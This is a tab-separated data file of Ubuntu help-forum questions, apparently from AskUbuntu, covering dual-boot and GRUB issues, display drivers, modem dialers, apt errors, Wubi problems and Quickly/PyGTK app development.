153969	how do i analyze my cpu usage over a long period of time ?	i am just wondering if there 's any ubuntu app that can track my cpu usage . the problem is that i am currently using a quad core i5 , whilst what i do most in daily usage is just browsing and rails developing . so i want an app that can analyse my cpu usage so that i can decide switching back to a dual core i3 . thanks .
153976	how do i get the parent process id of a given child process ?	how to get parent pid from a given children pid ? i know i can mannully check it under /proc , i am wonder if there is a smart/better way to achieve this in ubuntu . note the parent may or may not be killed . thanks
153977	how to set-up dsl dialer for ubuntu 12.04 lts	i have just installed ubuntu 12.04 lts and i 'm unable to get my dsl dialer working properly . to set this up in windows 7 i had to do following : control panel -- - > network and intertnet network and sharing center -- - > setup a new network or connection connect to the internet -- - > broadband pppoe enter username and password.. click 'connect ' and done . i am doing following steps in ubuntu with no luck : click on 'two arrows ' ( i do n't know what they are called ) on upper right corner . configure vpn -- - > dsl tab -- - > add then i entered username , password , mac address and clone mac address ( copied from auto ethernet ) . save the same set up used to work with ubuntu 10.10 but it is not working here . now whenever i click on dsl connection 1 to connect dialer 'auto ethernet ' gets disconneted and i end up with no internet connection . i am new to ubuntu , please suggest some easy steps . i have installed ubuntu alongside windows . and dialer works fine in windows environment , i am writing this in windows .
153981	how safe is gparted when resizing linux and windows partitions ?	i want to resize my partitions : i have 3 partitions : ubuntu 10.04 windows seven ubuntu 11.10 it 's booting with the boot installed by the ubuntu 11.10 version . i want to expand ( only expand ) all the 3 partitions . my hd is 1,8 tb so it 's big and i have no possibility to save before expanding . so my question is : if you tell me gparted work 99,99 % of the time , i 'm willing to take the risk . if you tell me gparted work 90 % of the time , i wo n't take that risk .
153984	why is my libreoffice so slow ?	every time i start libreoffice , i have to wait 3 minutes before i 'm able to start working ( screen is grey ) . why ? are there any ways to fix this problem ? regrets malte
153985	what bios settings must i change on a compaq dc5750 small form factor to install ubuntu ?	hp compaq dc5750 small form factor athlon 64 x2 3800+ 2.0ghz 2gb 160gb on starting the system it displayed this message : if you are running unix , you need to configure your system using the computer setup utility ( f10 ) attempts to install 12.04 64 bit from a usb flash stick cause this message : usi-partman crashed usi-partman failed with error code 10 ... i assume there is a connection between the two . which settings need to be changed ?
153986	ubuntu wo n't boot with windows7	i installed ubuntu 12.04 lts on a hard drive , and after that on a different partition on the same hard drive with windows7 . in both cases , after ubuntu finished installing , the computer reboots , and it boots automatic into window7 , without any boot menu to select the os . so , how can i make my bootloader to see both windows and ubuntu ?
153990	how do i configure wvdial to connect using a micromax 353g usb modem ?	i have micromax 353g usb modem . m using ubuntu 11.04 ... i installed wvdail nd configured wvdial.conf as [ dialer defaults ] init1 = atz init2 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 init3 = ats7=60 s30=0 s0=0 init4 = at+cgdcont=1 , '' aircelgprs.pr '' password = aircel phone = *99*** # modem type = usb modem stupid mode = 1 baud = 7200000 new ppd = yes dial attempts = 1 modem = /dev/ttyusb2 isdn = 0 username = aircel aftr commanding wvdial it says -- > wvdial : internet dialer version 1.61 -- > initializing modem . -- > sending : atz -- > sending : atq0 -- > re-sending : atz -- > modem not responding . unable to connect plz help
153994	why does grub selection no longer appear on my dual-boot system ?	i had installed a ubuntu 12.04 and fedora 17 dual boot on my system . during the installation i had installed ubuntu first and fedora later . fedora had recognized ubuntu and added it to the grub os selection list . afterwards i installed some routine updates on my ubuntu and after that i am just not able to see the grub os selection anymore when i boot . i am unable to understand what happened , both fedora and ubuntu use grub 2.0 . also it seems ubuntu is not able to recognize other existing linux operating systems ; because in the beginning i had installed fedora first and ubuntu later , but ubuntu did not recognize fedora at all , while fedora recognized ubuntu when i installed the other way round .
154001	why does the total space used on my hard drive not reflect what disk usage analyzer says ?	i 'm a bit curious as to why my hard drive space , according to disk usage analyzer , has 20 gb more used space than the space my files take up . here 's a screenshot : on `` / '' , it says that only 121.1 gb is used , but apparently 141.1 gb is used . i have 3 partitions on my hdd : a grub partition , my ubuntu partition , and a 3 gb swap partition . so , any thoughts ? i really would like to know if i can make this 141.1 gb shrink to the 120 gb that it should be .
154004	how can i clean up the traces left by a trial antivirus program i uninstalled ?	let 's say i installed an antivirus program for a trial period . then i did not like it and uninstalled it . but i am definitely sure that it leaves some files , traces etc . behind . so how can i clean my ubuntu 12.04 os that is like did not installed the trial program at all ?
154005	why ca n't i install microsoft office 2007 in ubuntu 11.04 ?	i am very new to ubuntu and only just getting a hang of it , and my questions might sound stupid especially because i am a learner in terms of techie things as well . so because of the nature of work where everyone uses stupid windows and microsoft , i need to have access to ms office 2007/2010 as documents with too many tables or images open all haywire in libre office ( which has otherwise been great ! ) . i have been reading up about installing ms office through wine/playonlinux , but have been unsuccessful so far . i downloaded a ms office 2007 package from pirate bay , which i extracted into a folder . i tried numerous different ways to install through wine and playonlinux , but will discuss the one which seems to be getting me somewhere . http : //www.webupd8.org/2011/01/how-to-install-microsoft-office-2007-in.html ... .. initially , when i would click on the install button of ms office , i get a message saying `` the install location you selected does not have 1558mb free space . free up space from the selected install location or choose a different install location '' . the install location in this case said `` c : \program files\microsoft office '' , which confused me as i do n't have drives named as c , z etc . i went to configure wine and under the drives tab , created a drive named a with the path location /media/cd025f16-433b-4a90-abb6-bb7a025d0450/ . also the space thing is confusing as i have at least 450gb of unused space on my computer . anyways , when i selected the a drive for installation , the installation starts , but soon i get the following error message , `` office can not find office.en-us\officelr.cab . browse to a valid installation source '' ... . the part saying `` officelr.cab '' have said different things after the office bit every time i have made an attempt . when i select the office.en-us sub-folder or any other folder within the folder where ms office 2007 is saved , it says `` invalid source '' ! i have been trying to get this sorted since 15hrs now ( addictive ! ) and have learnt loads of things in the process , but have not managed to crack it . it might be something stupidly simple i am not aware off that is stopping it . i would really appreciate some help ! thanks a lot.. also i am still getting used to the language , so might have many questions also i am using ubuntu 11.04 ( tag 11.04 ) . also i think i do n't have windows -- when my friend installed ubuntu on my new laptop which had windows 7 , he was trying to keep windows in a separate partition , but something happened and windows was not there ! looking forward to some support ! again thanks a lot
154006	what is the gksudo `` lock taken ... exiting '' warning and how do i resolve it ?	i recently run into problems when using gksudo . for example , the truecrypt installation fails because of following error : ** ( gksudo:3262 ) : warning ** : lock taken by pid : -1 . exiting . pid must be a process id , but -1 ca n't be , correct ? how to remove this kind of lock ?
154020	is there any api document browser like dash on ubuntu ?	i 've seen my friend enjoy using dash , in which you could look up all kinds of language document , java , c # , android , javascript , jquery , etc . that makes life much much more easier ! ! does anyone knows if there 's alternative on ubuntu ? i search desperately but no dash : code snippet manager and cocoa documentation browser .
154023	how do i quickly show/hide the desktop ?	i want to be able to hide all the windows quickly . how can i make an icon or entering which command will help me to hide all of the opened windows and show me a desktop ?
154027	can the unity file lens display detailed file information ?	is it possible to make unity file lens to display synthetic information about the files recalled by a search ? it would be very useful , for example , if it could display the location , the size and the date of the file ...
154028	ubuntu 12.04 stopped recognizing my benq monitor and reduced resolution to 1024x768	a few days ago i installed ubuntu 12.04 32bit desktop . it recognized my hardware without a problem ( at least that i know of ) and all worked fine . i left my system running ( it is at work ) through the night because it is also working as a database server and when i came today to work the resolution was 1024x768 ( the monitor recommends 1920x1080 ) even though in the display section of the system settings it was recognized as benq , and no higher resolution was offered . after a restart , the monitor name changed from benq to unknown . this is a desktop computer . i also installed gtk-redshift and f.lux . i checked additional drivers to see if there is something i can install but it did n't find anything . i tried to google it but i did n't find anything about a monitor stopping being recognized after it was already working . i did enable some ppas yesterday , namely webupd8 , mozillateam/thunderbird-stable and some other , and i also followed the instructions to patch the notifyosd to be more friendly : sudo add-apt-repository ppa : caffeine-developers/ppa sudo add-apt-repository ppa : leolik/leolik sudo apt-get update sudo apt-get upgrade sudo apt-get install libnotify-bin pkill notify-osd sudo add-apt-repository ppa : nilarimogard/webupd8 sudo apt-get update sudo apt-get install notifyosdconfig i now purged both caffeine-developers and leolik ppas in the hope it will help , but no change . has there been a change in the packages that could introduce this problem ? any help will be very appreciated : - ) omri
154030	how can i disable the workspace-switcher on the sidebar ?	i dont use the workspace-switcher on the sidebar but i 'm not able to remove it . i tried it with myunity , unity tweak tool , ... but there is no helpfull option . perhaps you can help me ?
154034	how can i move the gnome dock to the left side ?	i installed the gnome panel : https : //extensions.gnome.org/extension/17/dock/ but its on the right side , which is quite annoying becaus it alway popps up when using the scrollbar . how can i move it to the left ?
154044	installing particular versions when repo has newer versions ?	let 's have a metapackage which depends on the following packages depends : a ( =2 ) , b ( =2 ) , c ( =2 ) note the '= ' - i want to install these particular versions , not the most recent ones . additionally : b depends on a ( > =1 ) c depends on b ( > =1 ) and a ( > =1 ) if the most recent versions of a , b , c in the repository are 2 then this works . since i have put version 3 of a and version 3 of b in the repo sudo apt-get install my-meta-package refuses to finish with the following info : the following packages have unmet dependencies : my-meta-package : depends : b ( = 2 ) but 3 is to be installed depends : a ( = 2 ) but 3 is to be installed if i manually install versions 2 of a and b then the metapackage installs correctly , which strongly suggests that there is no hidden dependency on a3 or b3 . this is not a solution for the problem as the metapackage is installed automatically on many machines . question : what to do to make sudo apt-get install my-meta-package install versions 2,2,2 ? additionally , is there a way i could get an extended info what actually creates the need for version 3 of a and version 3 of b ?
154045	why does n't my cpu downclock when idling ?	i 've been fixing the overheating , thanks for that , it worked , i just reopened my laptop and cleaned it very well . but now idle is @ 50*c and not 20-30*c , because of the frequency being at max 2.5ghz . but normaly , at idle , the freq should be very low , like @ 1.2 but when i change it on the freq scaling on unity , it get back to 2.5.. any help ? ubuntu 11.10 , i5 m460 @ 2.5ghz
154046	dual monitor configuration changes to `` mirrored '' automatically	after installing 12.04 on my samsung x120 notebook ( with intel gma 4500 internal graphics card ) i have a problem with the configuration off my 2nd monitor . its a 22 '' with 1680 * 1050 pixel connected via hdmi . i use the display configuration and set internal display=off and external display=main display . that works fine . after rebooting i still have that configuration , but after a while ( often when i press a button on the keyboard ) , the configuration automatically changes to `` mirror screen '' and the internal display switches on . both displays then have a bad resolution . when i do the manual display configuration again , everything is fine for the duration of that session . what could be the problem , that this display configuration gets lost / resets ?
154049	ca n't change permissions on usb or system hard drives in ubuntu 12.04	i know there has been a lot of threads about this issue and most have been cleared up but not mine . i am a newbie and the terminal commands must be over my head . i tried to use pysdm but when it loads , it shows the drives on left window but everything on the right side is faded grey and no changes can be made . i had loaded pysdm via the software manager and then uninstalled and did the install via the terminal but same results . so can someone walk a dummy like me through how to fix the permission issues on external usb drives , internal mounted hard drives and then on how to get pysdm to work correctly ?
154050	ubuntu one syncronizing problems	i am a user of ubuntu and ubuntu one . first : i had a serious problem with ubuntu one . i have a windows and several ubuntu machine and they all sync one account . my first problem is that i ca n't really delete files . whenever i delete something ubu one resync it , so it appears again in my folder . furthermore , when i move something to another dir it synconize the new location and resync the old one , so i got doubled my files . i ca n't reorganize my files . so i tried to delete the duplicated files through the web dash , but i cant reorder and select multiple files by extension . for example i wanted to move all pdf to another location ... second : i ca n't configure in the ubuntu one app the loacation of the main one folder . for example i want my one folder to be on another partition than my home folder . it is a main problem in linux and windows also . i tried to move that folder in windows with the hardlink method . so i uninstalled the u1 , then i created a folder link to another drive , than installed the u1 . then i lost all my files in my u1 . lucky thing that i have a backup , but i thought u1 is a stable solution for me , and i planned to extend my space , but these bugs are major problems ! it 's worth to pay for it if it 's working perfectly . i think it 's more important than releasing a new version in every month .
154055	what is the ubuntu equivalent of the windows programs belarc or pc wizard ?	i provide technical support for several high schools in spain and i have been building up a inventory of the schools machines . on the windows only computers i normally run pc wizard to quickly get a good overview of the machines hardware , software and network settings . is there an equivalent tool preferable with a gui and an export option to html or pdf in ubuntu . i have tried a few options such as : gnomes gconf-editor hardinfo ( gui ) lshw ( cli ) i 'm just looking for an all in one application that builds a detailed profile of the installed software , hardware and network setting of a particular machine . i have found sysinfo which is quite good , it displays the most important hardware info and allows you to save it to a text file with a neat gui . i 'm still looking for a more complete solution but it 's a good start .
154056	low graphic performance with mobility radeon hd 4200 under unity3d	on my lenovo edge 11 '' i got ubuntu 12.04 installed . it runs with a ati mobility radeon hd 4200 ( rs880m ) and the additional ati drivers are correctly installed ( `` lshw -c video '' gives me a correct response ) . thing is , under unity3d my system is very slow . what do you think , is my graphic adapter too slow or is there any other problem ? i already reduced effects using compizconfig but that had no effect at all . thanks for help . : )
154059	access ubuntu one files without downloading them	as i said in the title , i am searching for a way to check files on my ubuntu one account without having to download them all , just to see what my folders contain . also , is there a feature that allows creating public links to some files in order to share them ? ( by giving a url ) thanks .
154060	how to make a launcher ( .desktop file ) for a binary file ?	i have sccceded in making launchers with python scripts , php scripts , etc as launchers . now i want to make a binary file as a launcher . it is not an installable binary file . it is actually the binary file for worldofgoo . the filename is worldofgoo.bin32 . on runing this file from terminal by the command ./worldofgoo.bin32 the game starts . when i added the path to this file in the exec field in the [ desktop entry ] , like this /path/to/folder/and/then/worldofgoo.bin32 * and when i clicked on the desktop file , it says `` permission denied '' how do i get a binary file to work in a .desktop file ?
154061	what is the boot up configuration file for the desktop ?	i 'm relatively new to linux and ubuntu . recently i installed 11.10 but found that some of the icons on the launcher were transparent as were some of the icons from the dash after launching . i created another admin account which did have the proper icons . furthermore the shutdown 'button ' on the top bar is missing in my original account but not in the new account . perhaps i could edit the startup desktop config file or something . perhaps it is something like 'desktop.conf ' ? i do n't want to mess up my computer by editing something i should n't .
154062	why is my dual-boot ubuntu partition showing up as a peripheral `` root.disk '' ?	i recently installed ubuntu 12.04 , which i had been booting from a usb key , as a dual-boot on my machine running windows 7 . from what i had read online while researching , i was prepared to have to shrink the windows partition and all that . but i never had to - it really was just a few clicks here and there and it was installed . i 'm still pretty confused about it , but whatever , it worked , and the two peacefully coexist on my machine , and i have broken things to fix before i worry about fixing unbroken things . so yesterday i got it in my head to look at my partitions ( i was considering making an all new partition to install the windows 8 release preview ) . what i saw confused me . here 's a screenshot of the disk utility . at this moment , there is nothing connected to my computer , and nothing in any of the optical drives/ports/card readers/etc . can you help me figure out what 's going on here ? don 's machine is , i believe , my windows partition - that 's the name i assigned my machine from windows explorer . pqservice is from what i can find online also windows , but having to do with backup . and system required , if i browse it in ubuntu , is definitely something to do with booting , and i believe it is also windows ' . according to the sizes shown , those three together should use up my 500 gb hd . then further down , as a `` peripheral device '' , it lists that 31 gb disk . this is obviously my ubuntu ( model : linux loop : root.disk ) , but why is it showing up as a peripheral ? so , to sum up those questions and to add some more random ones i had : why is ubuntu showing up as a peripheral device ? if the windows sections take up all 500 gb , where does ubuntu live ? if i renamed the disk partitions , would my life become a nightmare ( seriously - can i safely rename them ) ? why did n't i have to resize the windows partition in the first place ? would giving ubuntu more space improve its performance ( it hangs alot ) ? is it possible to have a partition for each os ( windows 7 & 8 , ubuntu ) , a partition for files , and a separate partition for backups ? is this towards the good or bad idea end of the spectrum ? @ elfy , would that explain why it keeps hanging ? i guess i 'll backup my files , rip it out , and reinstall it correctly later on today . @ takkat : rather than bother with converting it to a true install , which many things i read said would be difficult , i decided to just back up my small amount of data , erase it , and redo it the right way . now i have something a little more in keeping with what i would expect from a dual boot , and every time i start up , i see a purple grub screen . success i think . ( i successfully created the partition without problem or data loss , but was n't paying attention and installed 32 bit ubuntu on a 64 bit system . did n't work well . fixed the mbr , uninstalled linux , and installed the right ubuntu ) . so can i rename these partitions ? i set up a 50gb partition . how come the partition is 54 gb , and ubuntu only took 4 ?
154063	how do i reinstall the default ( non-proprietary ) display drivers ?	i , i 've installed ubuntu 11.10 on my dual screen pc and everything worked flawlessly . then they asked me about proprietary drivers : ati . i said `` ok install them '' . now it does n't work on my dual screen anymore , i 've got only one `` duplicated '' screen . so , my question is : how to re-install the original video driver ?
154071	how to repair a file on a truecrypt virtual encrypted disk ?	i have a file ( say volume.tc ) , which is a virtual encrypted disk . when i mount with sudo truecrypt volume.tc /mnt/v , i can access most of the files , but one file on this volume ( say corruptedfilename.sh ) got corrupt for some unknown reason : for example , when i call ls , it says ls : can not open corruptedfilename.sh : input/output error . i tried : using ntfsfix . i have only the mount point ( /mnt/v ) , but ntfsfix asks for a device name ( /dev/ ... ) . df -t reports filesystem type fuseblk ( looks like a nickname for ntfs ) and device /dev/mapper/truecrypt1 . however ntfsfix /dev/mapper/truecrypt1 does n't work ( it says refusing to operate on read-write mounted device /dev/mapper/truecrypt1. ) . rm /mnt/v/path/to/corruptedfilename.sh gives rm : can not remove `` /mnt/v/path/to/corruptedfilename.sh '' : input/output error . the question : is there a way to recover corruptedfilename.sh , or at least delete it , so i would be able to create it again ?
154072	why did ubuntu and windows start hanging mysteriously after i took a vacation ?	i installed ubuntu alongside my windows 7 , after partitioning my hdd using easeus partitioning manager . it was working perfectly , no problems , no data lost or corruption . then i went away for 2 days and in my absence i do n't know what happened in that period , now both windows 7 and ubuntu keep hanging continuously , like when you paint and change a brush it 'll hang , i mean on very simple commands and i know my computer does not hang on such petty things . i use it for developing music and the specification are : model : dell-xps processor : intel i5 , 2.53 ghz ram/memory : 4gb hard disk size : 500gb hdd windows 7 partition : 417 gb ubuntu partition : 50 gb please help .
154080	teeview-binding to couchdb not working with quickly ( pygtk + glade )	for the ubuntu app developer showdown i need to know some basics about quickly . one really important thing is to know how the treeview-binding works with couchdb . i did the tutorial1 ( rickspencer3.com/quickly-getting-started.html ) which is outdated but i got it working . then i tried to go through tutorial2 http : //rickspencer3.com/quickly-dialogs.html where i am almost done . the only thing is that the binding does not work . the source is in the following link hosted by me ( via dropbox ) : https : //dl.dropbox.com/u/5694459/super-text.tar.gz ( maybe someone has permission to add the code here in the question - because i think this is a very good tutorial - > after finishing you are able to to a lot of things with quickly ) you need to install couchdb in addition to quickly to run this code . and you must fill the database with data . enter some text and go to `` file - > save '' on menubar and enter a name and click ok- this adds a new record ( you can do this 3 times to have some data in the database ) after that here comes my problem : now my opendialog does not work ! go to `` file = > open '' on menubar the created data should be shown . but this does not work like in the tutorial . i do n't know if this is the right place to ask this question , but i do n't see an other way for myself to ask . and if i want to create an app in this short time for the app developer showdown , i need to know how this works because my app will use also a table which shows columns .
154083	opening files with quickly 's pygtk	i have already added the listeners and etc , but i ca n't get the actual open dialog code to work . i think it is something to do with the difference between gtk and gtk but i literally just started python yesterday . here is my code as of now : dialog = gtk.filechooserdialog ( `` open.. '' , none , gtk_file_chooser_action_open , ( gtk.stock_cancel , gtk.response_cancel , gtk.stock_open , gtk.response_ok ) ) dialog.set_default_response ( gtk.response_ok ) when the button is pressed , the console output this : traceback ( most recent call last ) : file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 61 , in on_btn_open_clicked self.open_file ( ) file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 41 , in open_file gtk_file_chooser_action_open , nameerror : global name 'gtk_file_chooser_action_open ' is not defined also when gtk_file_chooser_action_open is substituted for `` 0 '' ( which i believe is the int that constant points to ) it works fine but it flags up the same error on gtk.response_cancel and gtk.response_ok
154084	in which country ( s ) is our ubuntu one data stored ?	in view of the uk government 's new internet snooping proposals can anyone answer this question about the physical location of our data ?
154085	increasing partition size ubuntu 11.04	i am new to ubuntu and really appreciate your patience with my questions . i have been trying to download horrid ms office due to certain needs because of the nature of my work . i have been trying to downloads ms office 2007/2010 through wine . however , i keep facing the problem of having insufficient disk space . find attached an image of the same how do i increase the size of /dev/sda7 ? or alternatively how do i `` use a wineprefix that is located on the other partition '' to use the other partition ? i use ubuntu 11.04 . it is really urgent that i sort out the issue , and would be forever grateful ! i ca n't seem to attach an image , as i am a new user , so here are the details device directory type total free available used /dev/sda7 / ext4 5.5gib 303.3mib 14.7mib 5.3gib 99 % /dev/sda6 /media/cd025f16- ext 4 556.8gib 460.2gib 431.9gib 96.7gib 18 % 433b-4a90-abb6-bb7 a025d0450 /dev/sda2 /media/system fuseblk 100mib 75.9mib 75.9mib 24.1mib 24 % reserved
154088	dell inspiron 15 - hardware key being a pain	i enjoy the fact that instead of a switch on the side , dell put a key down , but one problem ... it stopped working . i do n't think this was caused by an update or anything ; i accidentally pressed the wireless key , and now it 's just refusing to turn back on . since i 'm basically the guy who 's meant to troubleshoot my grandmothers ' computer , like a sort of unpaid i.t . guy . if i ca n't get this wireless back working , there 'll be some major problems i do n't want to deal with . i 'm going to try to re-install the drivers , but that 's all i can come up with .
154089	what software needed to view this website ?	i have installed openjdk on my 12.04 . i wonder what software is needed to view a virtual tour of an apartment : http : //www.realestatedimensions.com/virtualtours/wymantowers/ ? thanks !
154090	broken debian package with quickly due to unicodedecodeerror	i created a test application with quickly . when i used quickly package , i get this warning : ubuntu packaging created in debian/ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . befehl gab einige warnungen zur端ck : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ** ( setup.py:3685 ) : warning ** : fehler beim senden der anmeldedaten : fehler beim senden der nachricht : die operation ist nicht erlaubt -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- if i try to install the .deb , i get this warning : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1041 , in _simulate trans.unauthenticated = self.__simulate ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1098 , in __simulate deb = self.install_file ( trans , simulate=true , **trans.kwargs ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 591 , in install_file deb = self._check_deb_file ( path , force , trans.uid ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1227 , in _check_deb_file `` \n % s '' % ( path , stdout ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 48 : ordinal not in range ( 128 ) running debuild instead of quickly package gave this output : http : //pastebin.ubuntu.com/1052328/
154094	ca n't load x.org nvidia driver when intel gpu is enabled ( 3 monitor setup )	i 'm trying to build a 3 monitor setup using 2 nvidia dvi outputs and 1 intel vga onboard output . i have this weird issue that when i enable my onboard intel vga out i ca n't load the nvidia x.org module anymore : [ 363.899 ] ( ww ) warning , could n't open module nvidia [ 363.899 ] ( ii ) unloadmodule : `` nvidia '' [ 363.899 ] ( ii ) unloading nvidia [ 363.899 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) when i disable the onboard intel vga ouput my nvidia module loads fine . i have all nvidia packages installed , and the kernel modules are correctly compiled and the nvidia kernel module is loaded . i 've tried many config settings , but i always have the same problem , i just ca n't use my nvidia card somehow when this onboard intel gpu is enabled . i think this x.org layout config is very similar to what i try to accomplish : triple-head on a lenovo t520 using this config ( only changing the busid ) the result is that i only have a working desktop on my intel output when the intel gpu is enabled , and only desktop on my nvidia screens when intel gpu is disabled . in both cases the nvidia card is listen when lspci is used . when i use jockey-text -l while intel gpu is enabled i get nothing , while disabled i get xorg : nvidia_current and xorg : nvidia_current_updates . any suggestion ?
154095	wrong window gets focus when switching workspace	i enjoy using vlc to play video while i do other work . the vlc window is set to by 'always on top ' and 'always on visible workspace ' . in former versions of ubuntu this has worked great . when i changed to a different workspace then whatever application i was working in would get the focus . but in 12.04 the vlc window will now always steal focus when i switch workspace . does anyone know how to change this ?
154096	server bandwidth monitoring program having web interface	i am looking around for a simple program that will log how much bandwidth has been used by my server . this should preferably be presented in a web interface . information /summary/functionality i 'm looking for is : -- bandwidth statistics per day -- log file of the last 6 months -- login enabled access to view thanks in advanced p.s - : is there a desktop tool for windows that could log into the server and give real-time statistics that comes along with it would also be very useful . edit i 'll simply it i think . what is the smallest/simplest program that only logs bandwidth per day/month with just command interface ? edit none seem to be what i want/am looking for.i 'm now just looking for a simple program that logs bandwidth used by the whole system every day . preferably into exportable to html .
154097	why does wubi slow down or freeze when there is heavy disk activity ?	im a first-time user to ubuntu-12.04 with wubi installation . i have a dell vostro 3450 with i5 2410m , 3 gb ram , intel hd3000 , amd 6630m hybrid . surfing and playing games works flawlessly . however , i 'm having huge problems when installing applications and generally copying and moving files . when doing so , system is significantly slower and freezes quite often ( firefox gets bluish , sometimes even black n white ) . i would say that ubuntu allocates too much resources on file transfers and installing , but even these tasks are very slow . here is very specific example : today i tried to move a 6 gb file from my windows 7 installation . it was good at first , so i jumped to firefox but after a while firefox started to randomly turn bluish and mouse was randomly stopping working . it was gradually worse and worse until it got to a point when firefox black and whited and mouse was n't working at all . i raged and went for some meal , when i got back screen was black . it probably unlogged me due to inactivity , when i pushed random button to bring screen to life i had to wait few minutes to let it show me only my screen background . no log in screen , just background and working mouse . notebook fan was working at 100 % so i assumed that file transfer was going on and i left it to work . nothing then changed for a full hour so i hard rebooted it . file transfer unsuccessful , it transfered hardly 2 gigs . is this normal ? what to do in these situations ? it did n't let me load system manager and not even the terminal .
154098	is unity causing my macbook to run near-burning hot ?	i have a macbook 5,1 with ubuntu 12.04 lts installed . using the default unity interface ( that is , compiz ) . with time the case on where the gpu is located gets very hot , a few more degrees and i 'd hurt myself . this is usual for some gaming , but in idle state surely not . the fans get working , and i can keep running , but my poor laptop gets burned : ( and battery is consumed faster .
154102	why does wubi installation fail with `` error : 'none type ' object has no attribute 'get_info ' '' ?	i 'm trying to install wubi from windows , and it fails half-way with this error : '' none type '' object has no attribute 'get_info' c : \user\hp\appdata\local\temp\wubi-12.04rev266 how can i complete wubi installation ?
154106	flash does not work under different user account .	flash works under my first created user account . about : plugins shows file : /usr/lib/mozilla/plugins/libflashplayer.so , which is fine . works with firefox and chromium . when i log out and login into another or new user account , about : plugins does not show the flash plugin . neither in firefox nor chromium . i tried flashplugin-nonfree , flashplugin-installer and flash-aid , installed under different user accounts . it always works only under my first created user account . how can i fix this ?
154110	how can i store variable changed by user ?	i 'm working on simple application for ubuntu app showdown . i 'm relatively new to programming ( started learning python last week ) , so maybe this question sounds stupid . anyway , lets say there 's a variable which the user can change . lets say its users name . how can i store it , so after next run of the program , this name will be displayed ? can i write changes to the file with the variable or do i need to create special file where i can write changes ? i use quickly for the record .
154112	how do i disable compiz and enable metacity with the command-line ?	i 've installed some new drivers and restarted , and much to my amusement when i log in my screen goes black , then white , and it never draws properly . i switched to the command line using ctrl + alt + f1 but i 'm not sure how to disable compiz and enable metacity as the default window manager . using metacity -- replace does n't work since the command line appears to be a separate login instance altogether ... any tips ? edit : i 've done this for now : http : //www.ubuntugeek.com/how-to-install-classic-gnome-desktop-in-ubuntu-12-04-precise.html
154116	invalid syntax error when following `` creating your first ubuntu app '' video	$ quickly run traceback ( most recent call last ) : file `` bin/mybrowser '' , line 32 , in < module > import mybrowser file `` /home/michael/mybrowser/mybrowser/__init__.py '' , line 14 , in < module > from mybrowser import mybrowserwindow file `` /home/michael/mybrowser/mybrowser/mybrowserwindow.py '' , line 39 def on_refreshbutton_clicked ( self , widget ) : ^syntaxerror : invalid syntax i was up to 26th minute on this youtube video : http : //www.youtube.com/watch ? v=so8hiprenbg & feature=g-u-u when i was to type quickly run , i got this invalid syntax . is there something i 've done wrong ?
154121	why wo n't remmina connect to windows 7 remote desktop ?	i 'm using ubuntu and i 'm trying to connect to another machine in a different network using remote desktop . in windows7 i have made the following in order to activate remote desktop : i 've gone to computer - > properties - > remote settings i 've selected the option : `` allow connections from computers running any version of remote desktop i 've opened `` windows firewall with advanced security '' in inbound rules i 've enabled the rules for remote desktop ( public and domain ) i have also installed remmina in the ubuntu machine . for configuring it i did the following steps : selected the rdp protocol in the server input i have written the windows machine public ip . in username / password i have typed my login credentials ( the same as my windows admin account ) but when i try to connect i get this error message : '' unable to connect to rdp server 89.130.251.160 '' if i ping my windows7 machine , i have a correct response . any suggestions ?
154122	why does apt-get fail to install the python-gasp package ?	when i try to install gasp in ubuntu 12.04 lts the following error occurs . student @ student-25 : ~ $ sudo apt-get install python-gasp [ sudo ] password for student : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package python-gasp any help , please ?
154127	which is the best virtual software for running latest windows program	which is the best virtual platform should i install to run latest windows program like ms-office , adobe photoshop cs4 , etc . i have ubuntu 12.04 running on 64 bits core i5 processor ? i need to run these programs on my ubuntu system without having to install windows . downloaded programs such as wine and play on linux but it shows error every time i try to run these windows program as mentioned above . any alternate softwares you can suggest ? thanks
154128	nvidia graphics card memory usage applet / application ?	i am looking for an application to display in real-time the memory usage of my nvidia graphics card . ideally i would like to have something similar to the little applet graph you can get through the system monitor applet in gnome . anybody knows if such application exists ?
154129	how can i publish my project code online so someone can help me with it ?	my local project has some code that is not working , and i 'd like to show it to someone to have a look at and possibly give me a hand with it . this is n't a short snippet or a single file ; there are multiple files and directories involved . how can i best publish my code ?
154137	why does apt-get give me an `` unable to connect '' error ?	after installing ubuntu 12.04 , i tried to update , but i got the following : student @ student-25 : ~ $ sudo apt-get update & & sudo apt-get upgrade ign cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) precise inrelease ign cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) precise/main translationindex ign cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) precise/restricted translationindex ign cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i38translation-en ign http : //extras.ubuntu.com precise inrelease err http : //extras.ubuntu.com precise release.gpg unable to connect to extras.ubuntu.com : http : help ?
